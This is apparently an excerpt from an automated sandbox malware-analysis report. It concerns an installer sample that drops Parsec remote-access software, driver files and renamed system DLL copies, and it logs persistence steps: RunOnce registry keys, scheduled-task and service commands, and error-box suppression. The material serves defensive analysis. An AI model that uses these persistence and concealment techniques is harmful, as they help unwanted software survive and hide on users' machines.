Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-CFLCO.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\ApplicationID.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-JBM9N.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-GTN75.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Program Files\Parsec\teams.exeJump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\SET638E.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\runonce.exe (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sysJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-BT11A.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-3KUTO.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\dmcfgutils.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-IQ3DU.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\unins000.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\ws2help.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\shrpubw.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\tapiui.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\UserInfo.dllJump to dropped file
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\mm.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\mcbuilder.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Local\Temp\is-O9NMT.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\MP43DECD.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeFile created: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\sscore.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-HI204.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\verifier.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-ADU4M.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-0HD4S.tmpJump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\parsecvirtualds.sys (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-NSRV7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\getuname.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeFile created: C:\Program Files\Parsec Virtual Display Driver\uninstall.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-V0EDB.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-O1M5L.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-G3B26.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-S2KJ6.tmpJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeFile created: C:\Users\user\AppData\Local\Temp\nsg84FF.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-KU5LP.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\iesysprep.dll (copy)Jump to dropped file
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeFile created: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-3JPOJ.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-VK3B0.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-M8LS1.tmpJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sysJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-R541B.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\kbdibm02.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-514OT.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\nsDialogs.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\System.dllJump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\SET614C.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\SyncInfrastructureps.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-66C2H.tmpJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-OGENO.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Program Files\Parsec\parsecd.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-IH0UT.tmpJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeFile created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.dllJump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.sys (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\7z.dll (copy)Jump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\parsecvirtualds.sys (copy)Jump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\parsecvusba.sys (copy)Jump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\SET70EC.tmpJump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\SET638E.tmpJump to dropped file

Boot Survival

barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
Source: C:\Windows\System32\drvinst.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\parsecvusba
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ParsecJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Parsec\Parsec.lnkJump to behavior
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD032AC0 StartServiceCtrlDispatcherW,39_2_00007FF7CD032AC0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" control Parsec 200

Hooking and other Techniques for Hiding and Protection

barindex
Tries to open files direct via NTFS file id
Source: C:\Windows\System32\drvinst.exeFile opened: NULL
Source: C:\Windows\System32\drvinst.exeFile opened: NULL
Source: C:\Windows\System32\drvinst.exeFile opened: NULL
Source: C:\Windows\System32\drvinst.exeFile opened: NULL
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec\pservice.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec\pservice.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
